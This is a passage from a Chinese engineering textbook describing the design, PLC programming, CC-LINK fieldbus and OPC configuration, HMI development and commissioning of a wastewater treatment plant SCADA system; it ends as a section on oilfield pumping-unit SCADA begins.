集中和就地两种运行方式的设定是由设置在就地控制箱上的远程/现场转换开关完成的(有些设备在MCC柜上也有转换开关,则将两个转换开关相应挡位串联)。在就地控制箱上还设有启、停按钮及信号灯等,只有当转换开关设置在远程自动时,各PLC控制站、操作计算机和中央控制机才能控制该设备;转换开关的状态信息送到PLC控制系统中,方便操作人员了解现场设备控制状态。 在系统运行过程中,若出现危害设备或对人身产生危险等(如发生火警)意外情况,运行人员可操作“紧急停止”按钮,控制系统立即停止所有运行设备。紧急停止是采用硬件切断方式的工作的,紧急停止状态也要送到PLC中,以使控制程序也进入该状态,同时为复位操作准备。要重新启动系统,必须消除故障和危险,并进行系统复位。 9.2.3 污水厂SCADA系统主要硬件设备选型 1.仪表选型 检测仪表是计算机监控系统信息来源,对控制功能的正确发挥起非常重要的作用。由于污水处理过程中工艺介质不是污水就是污泥,这是污水处理厂仪表选型的重要约束和必须考虑的问题。根据不同的工艺流程以及工艺控制要求,找出关键的测控点,用最少的仪表系统投入,来最大限度地满足工艺控制要求和管理人员对生产过程全面、准确、及时了解的需求。 污水处理厂常用的仪表包括各种检测仪表和在线分析仪表。在检测仪表的选型中,通常选用非接触式测量仪表。由于在线分析仪表价格昂贵,维护成本高,因此,只对非常重要和必须的参数配置在线分析仪表。考虑到成本,选用的仪表输出信号都是4~20mA,没有现场总线接口。表9.1列出了某污水处理厂选用的仪表及其功能与安装位置。 污水处理过程用电量较大,为了进行成本核算,同时也为了监控设备的运行状态,还配置了多个电量变送仪表。 表9.1 仪表选型、功能、安装位置一览表 2.氧化沟现场控制站PLC设备选型与配置 CC-LINK总线PLC主站选用三菱电机公司高性能的Q系列PLC产品。与其他PLC产品相比,该型号产品具有极高的性价比。而远程污水泵站、厂区泵房等预处理系统和污泥处理系统则选配了FX2N小型PLC。以下分别对CC-LINK总线控制系统设备选型和配置作介绍。 1)氧化沟PLC控制系统配置 氧化沟PLC控制系统要对4组氧化沟进行控制,现阶段按照一组设计。每个氧化沟生产工艺的机械设备配置包括:20台转刷(单速和双速各10台)、17台堰门、10台搅拌器和4台污泥泵。要检测的参数主要有氧化沟溶解氧、污泥浓度、温度和氧化沟液位等。首先统计要控制的设备的数字量输入(DI)信号名称,见表9.2。控制这些设备的数字量输出(DO)信号比较简单,对于堰门,要两个点;对于双速转刷,也要占用两个点,其他设备占用一个点。模拟量信号,每个检测点占用一个模拟量输入(AI)通道。 表9.2 被控设备数字量输入(DI)点统计 续表 结合上述I/O点种类的介绍和设备台数、现场检测点,就可以统计氧化沟控制所需要的I/O点总点数,如表9.3所示。根据测控点的地理分布情况,合理分配CC-LINK总线的PLC主站I/O点和现场两个远程I/O站的I/O点。 表9.3 氧化沟控制I/O点统计 再将上述I/O点分配到不同的I/O站。具体分配如表9.4所示。 表9.4 氧化沟CC-LINK总线的PLC站I/O点分配 根据上述各个站点I/O统计表,并作一定的I/O点冗余,对PLC模块等进行了选型和配置。其中氧化沟PLC主站的配置如表9.5所示。由于配置了高密度数字量输入和输出模块,大大减少了模块数量,以及由此带来的安装面积的减少,降低一定的成本。 表9.5 氧化沟PLC主站PLC控制系统配置 3个远程I/O站的配置是:1号站配置了AJ65SBTB1-32D模块,2号站配置了AJ65SBTB1-16D模块,3号站配置了AJ65SBTB2N-16R模块,这3个站每个站占用1个逻辑站资源。 2)泵房PLC本地站系统配置 泵房PLC站要控制的设备主要是污水物理处理设备(除去漂浮物和沙等),包括2台粗格栅、2台细格栅、2台螺旋输送机、1台无轴螺旋输送机、34鼓风机和4台进水泵等。该站还要检测进水泵房液位和PH等工艺参数。根据每个设备的工作要求和特性,可以统计该PLC站的I/O点数,其中DI 数为42,DO数为14,AI数为2。根据该I/O点数要求可以做出如表9.6所示的配置。考虑到主站与该PLC本地站有较大的信息传输量,因此设计该PLC站占用4个逻辑站资源。 表9.6 泵房PLC本地站PLC控制系统配置 3)污泥车间PLC本地站系统配置 污泥车间PLC本地站主要监控的设备包括污泥浓缩池中心传动浓缩机、匀质池水下搅拌器、脱水机房带式压滤机和污泥螺旋输送机等污泥处理设备。该站检测的参数有匀质池泥位、COD在线分析仪分析值和出水余氯等。可以统计该PLC站的I/O点数,如表9.7所示,其中DI 数为18,DO数为6,AI数为3。该PLC站占用3个逻辑站资源。 表9.7 污泥车间PLC本地站控制系统配置 3.上位机监控系统及通信网络配置 监控系统共配置了6台计算机,其中现场SCADA服务器和现场操作计算机选用高性能西门子工控机,监视器选用三星电子液晶显示器,而其他计算机选用联想商用机。监控组态软件选用西门子WINCC V5.1开发包和运行包。 在中央控制室和现场PLC控制柜分别配置了1台HIRSCHMANN公司工业级以太网交换机MS2108-2系列,它的底板上有2个槽。MS2108-2是具有网管功能的符合IEEE 802.3标准的模块化交换机,具有存储转发交换模式,支持以太网(10Mbit/s)和快速以太网(100Mbit/s)。同时为每台交换机配置了1块4口RJ-45模块MM2-4TX1,今后若系统要扩展只需要再增加MM2-4TX1即可。为每台交换机配置了一个光纤介质模块MM2-4FXM3,它提供4个多模光纤SC插口,这样可以留有2个接口作为备用。 4.电源配置 整个控制系统的电源由电源柜提供,采用双路集中供电方式,电源柜接受电力部门提供的两路22kV AC电源,经变压器等设备和自动切换装置后,分出多路电源,分别向上位机系统的UPS供电,保证交换机、上位机和网络系统用电;还经电源开关向现场UPS供电,保证现场PLC站、开关电源等用电。开关电源输出24V DC给开关量输入与输出模块和现场FX2NPLC模块用电。CC-LINK总线远程站也由电源柜统一供电。现场仪表由电源柜配给220V AC。 电源柜中的电源切换装置按两路电源的合闸先后,选择先合闸的一路作为它的输出,另一路作为后备。当正在供电的一路失电时,另一路备用电源自动投入。由于后面配置有在线式UPS,两路电源切换时的毫秒级间隙不会对PLC和上位监控计算机的运行造成数据丢失、程序中断等不利影响。 供给PLC输入、输出继电器的直流电源都在电源柜内,并经过带保险丝的端子分配给各控制柜及MCC柜,再分配给各自的PLC输入、输出模块。供给输入、输出模块的直流电源是各自独立的,即输入模块用一组电源,输出模块用另外一组电源,这样可以实现输入和输出的隔离。由于这两组电源关系到PLC的信号采集和控制,因此这些电源的可靠性要较高。 9.2.4 污水处理厂SCADA系统下位机PLC站控制软件开发 下位机PLC站的编程软件为三菱MELSEC GX Develop8.0,并配合三菱仿真软件和相应的模拟量模块、通信模块设置等软件包。该软件符合IEC 61131-3标准,提供梯形图、指令表、结构化文本等多种编程语言,可以自定义数据结构和功能模块,对PLC应用软件采用项目方式进行管理;该软件还具有在线编辑、仿真调试等功能,极大地方便了PLC控制软件的开发和调试。以下分别介绍各个PLC站控制要求和采用的控制方案及其编程。 1.远程泵站监控及无线通信系统开发 该污水厂目前有4个污水泵站收集城市污水,随着未来的发展,泵站的数量还会增加。因此系统在设计时要为未来系统扩展留有余地。污水泵站的工艺较简单,如图9.4所示。经过污水管网收集的污水经进水闸门进入泵站,污水经格栅机去除较大固体垃圾后进入泵坑,再由水泵将污水提升至出水管槽,所包含设备有高低压变配电设备,闸门、格栅机和水泵等。 图9.4 污水泵站工艺流程 污水泵站采用以PLC为主的监控设备。PLC一方面采集污水泵站的实时工艺数据和设备状态信息,并将数据送到污水处理厂监控计算机;另一方面也接受厂区监控计算机的控制命令。每个泵站安装有触摸屏操作终端,该操作终端与PLC连接,操作人员可以直接对泵站的设备进行参数设定和监控。 泵站监控系统要监控的设备主要有进水闸门、格栅机、潜水泵等,并采集进水口、泵坑及出水口的液位。这些设备的控制方式与污水泵房设备控制类似,这里不作详细介绍。 本系统中,各个泵站与污水处理厂之间距离远、地理位置分散,适宜采用无线电通信方式,完成整个系统的数据采集和传输。污水处理厂监控计算机中的应用软件执行通信程序,通过主电台与远端电台以轮询方式通信,远端电台下连接各个泵站的PLC控制设备。电台工作于专用数传频段,数据接口均为RS-232串行通信,传输速率可在9600~19200bps之间选择。该系统采用的一点对多点网络的中心站覆盖半径依地理状况等因素不同最大可以达到30~50km。 多点轮询属于时分双工通信的方式,即主站计算机按照从站终端的地址发出轮询信息,并接收从站发来的响应信息,而从站终端则接收主站轮询的信息并根据要求发出一系列的响应信息。主站采用轮询的方法逐个与从站通信,并对从站发来的信息进行汇总和处理。数据分析存放于主站为各个分站分配的单元。由上位机采集这些数据,分析、处理、存档,再根据工况计算比较后通过无线通信系统分别发出各从站的调控命令,完成调控任务。 2.氧化沟PLC控制站配置 1)CC-LINK现场总线与PLC控制站主、从站配置 CC-LINK是Control& Communication Link(控制与通信链路系统)的简称,是三菱电机于1996年推出的开放式现场总线,其数据容量大,通信速度可多级选择,最高可达10M。它是一个复合的、开放的、适应性强的网络系统,能够适应于较高的管理层网络到较低的传感器层网络的不同范围。CC-LINK是一个以设备层为主的网络,整个一层网络由1个主站和最多64个从站组成。网络中的主站由PLC担当,从站可以是远程I/O模块、特殊功能模块、带有CPU的PLC本地站、人机界面、变频器及各种测量仪表、阀门等现场仪表设备。采用第三方厂商生产的网关还可以实现从CC-LINK到ASI总线的连接。CC-LINK的底层通信协议遵循RS-485,一般情况下,CC-LINK主要采用广播轮询的方式进行通信,CC-LINK也支持主站与本地站、智能设备站之间的瞬间通信。信息从主站传递到从站,信息数据将以150字节为单位分割,并以150字节传递。若从从站传递到主站,每批信息数据最大为34字节。瞬时传送需由专门指令来完成,但不会影响循环通信的时间。 本系统考虑选用CC-LINK现场总线,主要时基于以下原因: · 采用了CC-LINK远程模块,模块安装在各控制柜中,构成分布式结构,大大节省和简化了整个系统的配线,提高了系统的稳定性,降低了系统的故障率。 · CC-LINK远程模块集电源、通信、外部I/O于一体,且体积非常小,价格低,既减少了安装空间,又节约了成本。每个模块只需一根电源线和一根通信线。 用CC-LINK网络参数功能设置各站参数,很方便,就像填表格一样简单,并且只需确定第一个站的软元件的地址即可。 2)氧化沟PLC控制站主、从站配置 依照前文所述的控制系统PLC选型及CC-LINK现场总线的要求,设计出如图9.5所示的污水处理厂CC-LINK现场总线控制系统。该系统有一个主站和5个从站,其中1号到3号从站是远程I/O站,4号和5号从站是远程设备站。主站和1~3号从站完成氧化沟设备的控制,是该系统的核心控制部分;4号从站对进水泵房及所属的设备进行控制;5号从站完成污泥处理工段设备的控制。5个从站一共占用了11个逻辑站资源。 图9.5 CC-LINK总线网络控制系统 完成CC-LINK总线控制系统硬件选型和配置后,就需要对CC-LINK网络参数和从站参数进行设置。从站参数配置如图9.6所示,而CC-LINK网络参数和主站配置如图9.7所示。CC-LINK主站PLC占用I/O地址是从0000~035F。其中5个输入和4个输出模块每个模块占用64点,其他3个模块每个占用32点。3个远程I/O从站每个站占用32位,寄存器占4个字,因此各站远程刷新软元件地址和远程寄存器刷新软元件地址分别为:1号站0360~037F,D400~D403, D600~D603;2号站0380~039F,D404~D407, D604~D607;3号站03A0~03BF,D408~D411, D608~D611。其他依此类推。 在对PLC主站进行编程前,还需要对PLC的参数进行设置。PLC参数窗口如图9.8所示,在该窗口中,可以设置一系列PLC的参数。图9.8所示为对PLC的软元件设置图,在图中,设置了数据寄存器D的锁存地址范围。其他的锁存地址用系统默认的。需要注意的是,锁存(1)参数是可以用PLC上的锁存复位开关复位的,而锁存(2)参数是不可以用PLC上的锁存复位开关复位的,只有用强制指令才可以。 图9.6 CC-LINK从站参数设置 图9.7 CC-LINK网络参数设置 图9.8 PLC软元件设置 3.氧化沟CC-LINK主站PLC控制软件开发 氧化沟PLC控制站主要完成氧化沟工段主要设备的控制,如高/低速转刷、堰门的监控等。氧化沟是污水处理厂的核心工段,污水处理效果及污水处理厂的运行成本很大部分是取决于氧化沟的控制水平。氧化沟工段的控制目标是根据污水流量、进/出水水质及污水处理工艺周期,实现进水与出水堰门开、关状态的自动切换,调节转刷的工作状态来控制污水中的溶解氧,最终完成对污水的处理,实现污水达标排放。 该PLC站监控的工艺参数有:进水流量、3个氧化沟的溶解氧、pH值、出水COD和污泥浊度等。 1)氧化沟污水处理工艺 一体式三槽氧化沟属于交替工作式氧化沟,其运行时,三沟交替进行硝化和反硝化反应,两侧沟交替作为沉淀池。进水交替地引入氧化沟,出水相应地从两侧沟交替引出。进出水连续,曝气转刷间歇工作。该污水处理厂采用的工艺是把每天24个小时分为3个周期,每个周期又分为A~F共8个阶段,每个阶段的具体工艺如图9.9所示。 图9.9 三槽氧化沟工艺 图9.9中英文含义及工艺具体介绍如下: (1)DN:反硝化。在缺氧状态下,微生物降解污水中的有机物,硝酸盐氮还原成氮气释放到大气中去。 (2)N:硝化。在好氧状态下,有机物(BOD和COD)被去除,氨态氮分解氧化,转化为硝酸盐氮。 (3)S:沉淀。泥水分离,污泥沉淀,上部清液经澄清后由堰门排出池外。 根据工艺要求, 配水井堰门的开启、关闭与氧化沟出水堰门的开启和关闭具有一定的关系。IW1堰门对应1号氧化沟(边沟)进水堰门, 出水堰门的编号为W1、W2、W3、W4 和W5 、W6和W7。IW2堰门对应2号氧化沟(中沟)进水堰门。IW3堰门对应3号氧化沟(边沟)进水堰门, 出水堰门的编号为W8、W9、W10、W11、W12、W13和W14。每周期中各阶段时间、配水井和氧化沟堰门启闭操作如表9.8所示。 表9.8 各操作阶段时间及堰门动作周期 氧化沟中转刷的控制主要根据如图9.9所示的污水生化处理要求,根据硝化、反硝化、沉淀等阶段的特点合理控制充氧。而污泥泵则是在硝化阶段工作,搅拌器可以根据进水水质情况及氧化沟运行周期合理控制其开、停。 氧化沟系统控制可以比较灵活。当污水处理厂的进水负荷变化或水的成分变化时,控制系统可以调整每个阶段时间以适应工艺上的变化。 2)氧化沟PLC控制程序开发 随着IEC61131-3标准的推出和符合该标准的编程软件的开发,PLC控制系统的编程也发生了一定的变化。在开发污水处理厂PLC控制程序时,采用了一些新的技术和思路,现对其作介绍: (1)采用标签编程:即程序中的I/O地址和其他一些参数都采用标签而不是实际的寄存器地址,这样可以方便程序修改和调试,特别是可以专注于软件开发而不花费过多的精力在I/O地址分配。 (2)采用面向对象的程序设计思想:如对转刷、堰门等设备,由于每一类设备的控制都有相似性,因此为每类设备开发功能块。这样可以提高PLC程序设计的质量,同时也提高程序的可读性和可移植性。 (3)多种编程语言的使用:每种编程语言都有其特点,因此,采用多种编程语言可以发挥不同编程语言的优点,简化程序开发。 关于上述这几点,下面结合具体程序开发来介绍。 堰门的控制中,堰门的开启和关闭是通过控制堰门电机的正、反转实现的。而堰门的开、关到位则是通过接近开关信号反馈控制。堰门的控制方式要求实现自动、上位机手动两种方式。我们定义了堰门FB,其中的内部变量定义如图9.10所示。其中输入变量的含义是:WAUTOON表示运行堰门动作的逻辑;MASTERAUTO表示上位机自动允许;MASTERON表示上位机手动,MASTERAUTO和MASTERON受上位机监控软件控制,它们不能同时设置为1;如果在上位机把堰门投入自动,就置MASTERAUTO为1,MASTERON为0;如果在上位机手动打开堰门,就置MASTERAUTO为0,MASTERON 为1;如果在上位机手动停止堰门电机动作,就置MASTERAUTO为0,MASTERON为0;LOCALAUTO表示允许自动运行,该信号来自现场转换开关;FAULT表示堰门电机故障;SWITCH表示限位开关信号;LOCKOUT表示堰门电机正、反转互锁信号。WEIROUT表示FB的输出。根据堰门动作逻辑用梯形图设计其FB的程序代码,如图9.10所示。定义好堰门的FB后,可以在程序中调用该FB,如图9.11所示。在调用时,根本不用考虑堰门控制的逻辑,只是把相应的输入和输出填入即可。而由于采用了标签编程,每个功能块的输入和输出都用具有一定意义的名字表示。由于I/O分配和赋予标签时,与I/O点对应的标签名也是同样有一定意义的,因此,在FB调用,即用实形参数代替形式参数时,把变量填写错误的情况可以大大减少,例如把XIW1FAULT填写到SWITCH。当然,即使填写错了,也很容易发现这样的错误并很快修改。而如果只采用X##或Y##等这样的地址时,很难发现地址错误。 图9.10 堰门控制的FB 图9.11 程序中调用堰门FB 采用FB编程还大大方便了对程序的修改和移植。假设在程序设计中对接近开关是按照常闭触点设计,但是到了现场调试时发现现场使用的是常开触点的。这时,只需要修改堰门的FB,即将图9.6中的常开状态的SWITCH改为常闭触点,即可完成修改,而不需要对主程序部分作任何修改。试想一下,如果不采用这样的编程方法,当只有几个这样的控制设备时,可以在程序中做修改;若有几十甚至更多这样的设备,修改程序的工作量就大了,而且出错的概率也提高了。而这里采用了FB后,不论多少设备,只需要修改一次FB的定义,大大减少了程序修改、调试工作。另外,如果在一个新的工程中,采用的接近开关与已有的工程不符,也可以采用这样的方法修改,所以说程序的可移植性也增加了。 IEC 61131-3编程语言标准允许自定义数据结构,而三菱电机MELSEC GX Develop8.0也支持该功能。因此,在程序设计时,可以利用该功能来开发程序。例如,在转刷控制中,定义了转刷控制数据结构,这样可以简化变量管理,提高程序可读性。其具体过程是:编程软件的“结构体”中定义数据结构SSRTYPE,该结构中有6个布尔型变量,如图9.12所示。然后在全局变量里定义SSRTYPE的结构变量R2CON,再设置该变量的详细软元件,如图9.13所示。这样就可以在程序中使用该结构变量,如要利用变量“现场是否自动运行”,就可以用R2CON.AUTOENABLE。 图9.12 自定义结构变量 图9.13 自定义结构变量 由于转刷的控制比较复杂,特别是其全自动运行逻辑牵涉到数学运算和模拟量处理,因此,在编写转刷工作状态设定的逻辑时,我们采用结构化文本(ST)进行编程,避免了采用梯形图编程的复杂性。而在转刷的输出控制中,仍然采用了类似堰门控制中的FB,分别开发了双速装刷和单速转刷的FB模块。 氧化沟设备控制程序的流程图如图9.14所示。程序首先调用初始化子程序,该程序只在PLC上电时执行,主要完成一些参数初始化,如把所有设备的上位机运行自动MASTEON状态置OFF,以防止系统异常开启时设备同时动作;设置工作周期参数;设置自动工作时DO数值;设置设备启动延时时间等。完成初始化后,程序根据工作模式选择开关的状态确定工作方式。若是手动,则将相应的手动操作逻辑置ON,若是半自动或全自动,则进行工作周期判断。然后再确定是半自动还是全自动。若是半自动,程序会根据半自动选择开关的状态、工作周期等确定哪些设备该动作,并将相应的半自动动作逻辑置ON;若是全自动,则程序根据DO数值、工作周期和设备工作状态等确定哪些设备工作,并将相应的全自动动作逻辑置ON。为了实现一段时间内设备工作时间比较接近,采用了先开启设备先停,先停设备先开的策略。当然,有些情况下,这个策略也较难实现,因为还要考虑到设备对角运行等控制策略。最后采用了专门的子程序处理输出逻辑,即设备的输出是统一控制的。 图9.14 氧化沟设备PLC控制程序流程图 4.进水泵房PLC从站控制 进水泵房PLC站主要控制污水物理处理设备,去除污水中的漂浮物和沙砾,并通过潜水泵将污水输送到氧化沟。这个工段的主要设备有粗格栅、进水泵、细格栅、旋流沉沙池设备、细格栅、鼓风机和无轴螺旋输送机等。以下对这些设备的控制要求和PLC控制软件开发作介绍。 1)粗格栅和细格栅 从流体力学的角度讲,随着栅条上漂浮物的增多,栅条处的水阻会随之增大,这样必定会在栅前和栅后形成一个水位差,因此可以根据格栅前后水位差值控制格栅的开启。通常格栅后水位基本恒定,因此只需要在格栅前设置液位计。 实践中还有一种做法就是采用时间工作方式控制格栅,即按照一定的启、停周期让格栅工作。运行的时间周期、间隔周期、工作时间等可在计算机上设定。本系统设计了这两种控制方式,操作人员可以选择在两种工作方式中切换。 与粗格栅和细格栅配套的无轴螺旋输送机等与格栅连动。 2)进水泵 过去许多污水处理厂进水泵的控制都采用开关控制,其控制目标是保证积水井污水不会溢出。常用的策略就是当水位升到某个位置时,就启动相应的水泵,低于某个位置时,就停止某水泵。这样做有较多的缺点。首先由于进水泵的频繁开停所造成的间断进水或进水流量的突变影响氧化沟工艺运行,对厌氧、缺氧、好氧等过程及除磷脱氮、生物降解和沉淀效果产生影响。较严重的情况是造成污泥的膨胀、腐化,影响出水水质和污泥的脱水效果。此外,进水泵的频繁启动,必然降低配套电机的寿命和加速相关机械部件的磨损。由于城市生活用水高、低峰等问题,这种现象很难避免。 为此,本系统中在配置的4台进水泵(3用1备)中,选择一台水泵可以变频调速。而其他水泵仍然采用开关控制。具体的控制策略是: (1)当水位低于下限hmin时,无水泵启动。 (2)当水位高于(hmin+Δ1)时,启动变频调速水泵,变频器的工作频率为fmin,水位在(hmin+Δ1,hmin+Δ2)之间变化时,变频器的工作频率也在(fmin,fmax)之间线性变化。若水位继续升高,到了启动第二台泵的条件,则启动另一台水泵。 (3)启动另一台水泵后,若水位继续升高,到了启动第三台泵的条件,则启动第三台泵。通常情况下,当启动了一台水泵后,液位要下降,此时,降低变频器的工作频率,使得变频调速的水泵出水量减小。若水位继续下降到停止一台泵的液位,则停止一台泵。 通过以上策略,不但可以保证集水井的污水不溢出,还能使得氧化沟进水流量的波动减小,并且避免了设备的频繁启动。 在正常工况下,开启一台水泵和1台变频调速水泵即可满足工艺要求。变频调速水泵可以适应从远程泵站收集来的污水流量的变化。 在泵站等水泵控制中,还存在多台设备工作时间不平衡的问题,即某台泵总的工作时间很长,而另外的一台泵工作时间很短,这些对设备的寿命和维护是不利的。对此,本系统采用了一个简单的策略,即先启动的水泵先停,先停止的水泵先开。处理该问题还有所谓的循环备用策略,即对设备的启、停首先安排好顺序,这样设备的工作时间必然不平衡。当运行到一定时间后(如3天),对该顺序进行调整。 3)沉沙池设备 旋流沉沙池利用旋转水流的摩擦作用对污水中的沙砾进行清洗并使之沉淀下来。生产管理者最为关心的是排沙问题,即何时启动排沙泵排除旋流沉沙池沙斗中的积沙。排沙周期太长,沙斗中积沙容易板结,造成排沙不彻底;时间太短,每次排沙夹带出大量的水,造成能量浪费。虽然理论上可以在沙斗中设置沙位计来解决这个问题,但选择一个恰当形式的沙位计安装在沙斗中非常困难。此外,一般城市每立方米污水中含沙量非常低,在旋流沉沙池中沉积的沙砾量也很小。因此多数污水处理厂在旋流沉沙池不设置任何仪表,排沙问题可以采用定时排放的办法来解决。本系统采用时间控制方式进行排沙。 5.污泥处理工段PLC从站控制 污泥处理工段的控制相对比较简单,被控设备主要有浓缩池的浓缩机、均质池搅拌器和污泥压滤机等。浓缩池的浓缩机开启根据污泥闸门的开启时间来控制,即在污泥闸门开启一定时间后,启动浓缩机;搅拌器根据均质池液位进行启/停;而污泥压滤机的控制较复杂,设备会有配套的控制系统,本系统只是从配套的控制系统中采集其工作状态等数据。 6.PLC控制系统的程序组织 现代中等规模以上的PLC都采取项目的形式组成程序,这方便了对于大型工程的程序开发与管理。可以根据软件工程的思想,将程序分为多个模块,每个模块完成不同的功能,其执行的优先级和对实时性要求也可以有所不同。本系统的污水处理PLC控制程序就采取这种方式。PLC应用软件一共有7个程序,它们的名称和属性设置如图9.15所示。包含一个初始化程序,主要执行参数的初始化;一个采取固定扫描周期的主程序;一个程序专门用来判断运行周期;堰门控制用一个程序;转刷的半自动控制用一个程序;转刷的全自动控制用一个程序。物理泵和搅拌器的控制也采用一个程序。采取这种方式,调试非常方便,查找问题也很容易。 图9.15 氧化沟设备PLC控制系统程序组织 9.2.5 基于OPC技术的上、下位机通信系统开发 正如前文介绍,OPC服务器一般是由各个控制设备制造商提供的,不同的公司都为其相应的硬件开发了OPC服务器,以方便应用软件开发人员使用该硬件。三菱电机公司提供了其PLC设备的OPC服务器,该服务器支持多种三菱电机的PLC产品,如FX系列、A系列和Q系列等产品。该OPC服务器还支持多种通信协议,如以太网、CC-LINK总线协议、串口及三菱电机公司自身的通信协议在进行OPC服务器配置时,启动OPC服务器进行端口设置。在端口设置窗口有不同的选项。由于使用以太网通信,因此进行以太网端口配置。若选择其他的通信方式,就要选择其他可选项。如选用串口通信,就应该对“COM Port”进行设置。首先建立名为E71_1的新端口。该端口的配置如图9.16所示。选用面向连接的TCP/IP协议而非UDP/IP协议,这主要是考虑到可以提高通信的可靠性。在HOST IP中填写SCADA服务器的地址192.168.1.1,端口写0。PLC主站的IP为192.168.1.5,端口号为8192(在PLC以太网模块设置时为2000,这个数是十六进制数,而在OPC服务器中,应该写十进制数。这一点十分重要,否则,OPC服务器与现场以太网模块通信不成功)。完成该设置后退出端口设置窗口。 图9.16 以太网OPC服务器设置窗口 设备添置完成后,还要添加设备并进行属性配置。在设备属性窗口中,要选择先前配置的端口,并选择相应的PLC及相关的通信参数。 添加新的设备名称为E71M1和E71M2,按照图9.17所示进行配置。然后在设备E71M1下定义4个站组,对应CC-LINK总线的4个站。分别为不同的站建立不同的设备组,再在组中定义变量标签。图9.18所示即为定义堰门设备采集和控制参数(为了便于显示,省去了部分设备组)。反复进行上面工作,直到所有的设备标签都建立。然后把OPC配置文件保存,并设置该文件为OPC启动后的默认配置文件。OPC服务器配置完成了就可以进行离线和在线测试。 图9.17 OPC服务器设备属性定义窗口 图9.18 配置好的OPC服务器窗口 为实现上位机OPC服务器通过以太网与下位机PLC控制站通信,下位机PLC控制站的以太网通信模块要进行设置。主要的参数设置界面如图9.19和图9.20所示。其中图9.20主要设置以太网的操作参数。这里需要特别注意的是“TCP生存确认设置”中最好选择“使用Ping”如果选择“使用KeepAlive”,一旦上位机OPC服务器与下位机的通信中断(中断原因可以是上位机关机、下位机停电、网络中断等),上、下位机的通信不能自动重新建立,必须把PLC进行复位操作才能再次恢复通信。显然,当PLC在运行过程中,对其复位意味着整个控制系统要停止运行,这样的代价是很大的。图9.21主要设置以太网的协议和参数。这里同样要注意的是,这里设置的端口号2000是十六进制数,而在图9.16中的MELSEC Port中设置的参数必须是十进制数8192。 图9.19 以太网模块参数设置 图9.20 以太网操作参数设置 图9.21 以太网端口等参数设置 9.2.6 污水处理厂SCADA系统上位机软件开发 1. 上位机监控软件功能 污水处理厂SCADA系统上位机监控软件利用组态软件进行二次开发,具有友好的人机界面,丰富和完善的监控和管理功能,有利于操作人员更好地了解企业运行情况。具体来说,其主要功能有以下几点。 1)设备的动态流程及各工段的工艺流程图显示和模拟 这部分主要显示整个生产流程,包括总貌显示、分组显示,并提供全流程的动态模拟,生产过程的状态一目了然。 2)过程主要参数的实时和历史趋势 为了直观地反映过程的主要参数的变化趋势,系统设置了实时和历史趋势窗口,以反映参数在现在一段时间内的变化趋势和在过去一段时间内的变化趋势。通过建立各类信息数据库,对各种参数做趋势曲线,对生产流程工况进行分析,可以寻求污水厂处理工艺的最佳运行规律,改善管理,提高效率。比如氧化沟进水流量的趋势曲线,据此可以知道污水负荷变化的情况及变化周期,因而可以更好地指导生产操作。 3)报警和报警管理 生产过程中有异常情况发生时,报警系统都能及时报警。当设备出现故障时,系统不但进行报警,还停止设备运行。当有紧急情况发生时,甚至停止整个生产过程。报警包括模拟量和数字量报警。如果进水泵电机过热,则过热继电器将会切断电机,这一故障信号不仅能在模拟屏上得到反映,而且在各级计算机上也同样得到反映。报警还包括了对系统通信状态的报警提示。 4)对全厂生产过程的集中控制功能 全厂的设备分布在不同的地方,现场的控制开关只控制局部的设备,无法对全厂的设备进行协调控制。SCADA系统可以对全厂的所有设备直接进行控制。 5)以报表形式记录全厂生产情况,便于管理 生产过程中的各种操作数据,都可以以各种形式的报表反映出来。报表可以分为单项报表和综合报表。如,设备运行状态报表可以记录设备开停次数、故障情况、故障时间、运行时间等。反映生产情况的综合报表可以记录污水处理负荷、污泥流量、电能消耗等。 6)安全与用户管理 不同的用户具有不同的操作权限,系统可以为具有不同操作权限的操作人员设置不同的操作,并实现用户管理。 2. 监控软件开发 组态软件采用西门子WinCC 5.1开发。该软件详细的介绍在本书5.5.3节。程序开发的步骤参照本书5.7节。由于介绍软件开发过程比较繁琐,多是对组态软件提供的各种组态的参数设置与组态。现对设计中的一些主要内容和应用的技术作介绍。 1)主要操作界面 根据系统功能要求,设计了8个与污水处理过程监控有关的界面,还有2个用户管理窗口。8个污水处理过程监控界面包括预处理界面(如图9.22所示)、1号氧化沟界面(如图9.23所示)、2号氧化沟界面(预留)、污泥处理界面、远程泵站界面等,通过这些界面可以有效监控污水处理过程。报警窗口提供了对报警信息的集中显示、管理等。数据报表窗口可以方便操作人员对生产过程的数据汇总和打印。参数设置窗口可以对污水处理过程的许多重要参数实现集中设置和管理,通过该窗口,还可以调出工艺参数实时和历史趋势显示。 图9.22 氧化沟工段界面 图9.23 预处理工段界面 2)用户管理 设计了登录窗口,只有具有有效账号的用户才能登录和操作该系统。不同的操作人员具有不同的级别,如只有系统管理员才能修改设备控制参数,才能对用户账号进行管理,而最低级别的操作人员只能浏览操作界面。 3)各种动态模拟技术 采用组态软件设计监控系统人机界面的一个明显好处是可以比较容易实现对生产过程的动态模拟。组态软件提供了位置、动作、颜色、可见/不可见等多种动画手段和许多生产过程常用的设备对象,许多对象还内嵌动态变量。本软件综合利用了这些手段来实现对生产过程的动态模拟,如对于设备的工作状态指示,用黄色表示待机,用绿色表示工作、用红色表示故障。在氧化沟界面中,分别对1号、2号和3号沟设置了颜色动画显示,操作人员根据颜色可以一眼看出工艺处于什么阶段。 4)关于设备控制手段 监控系统的一个重要功能是提供操作人员直观的方式对设备进行操作。本系统统一采用如图9.24所示的设备控制窗口,操作人员只要用鼠标单击相应的设备,就会弹出该窗口,该窗口一方面提示目前设备状态,另一方面又提供了改变设备工作状态的按钮。 图9.24 统一的设备控制窗口 9.2.7 系统调试与运行 三菱电机公司提供了PLC程序的仿真软件包LLT,该软件包极大地方便了在实验室对程序进行调试。在污水处理厂PLC程序开发过程中,经常用该软件包对所开发的FB等程序段进行调试,然后把这些经过调试的小的程序段再组合起来实现更复杂的功能,最后再进行整个程序的离线仿真。通过这个方式,在实验室就可以很好地验证程序功能与设计是否一致,极大地缩短了程序开发周期,减少了各种错误发生。 由于仿真调试的局限性,在仿真调试的基础上,又进行了离线程序调试,即将PLC程序下载到PLC存储器中,用信号发生器模拟各种输入信号,分析系统运行是否正常,特别是模拟DO信号,测试氧化沟PLC程序自动运行时工作是否正常。 在完成对各个PLC站控制程序的调试后,就是测试网络连接和上、下位机通信。在开发上位机组态软件时,由于采用了OPC技术,因此可以利用OPC服务器的仿真功能进行调试。在此基础上,将整个系统搭建起来进行联调,测试输入和输出是否正常。 关于污水处理厂SCADA系统工程实时方面的内容在这里就不再做介绍,读者可以参考相关的国家标准和规范。 9.3 油田抽油机SCADA系统设计与开发 9.3.1 油田抽油机SCADA系统组成 1.系统总体结构 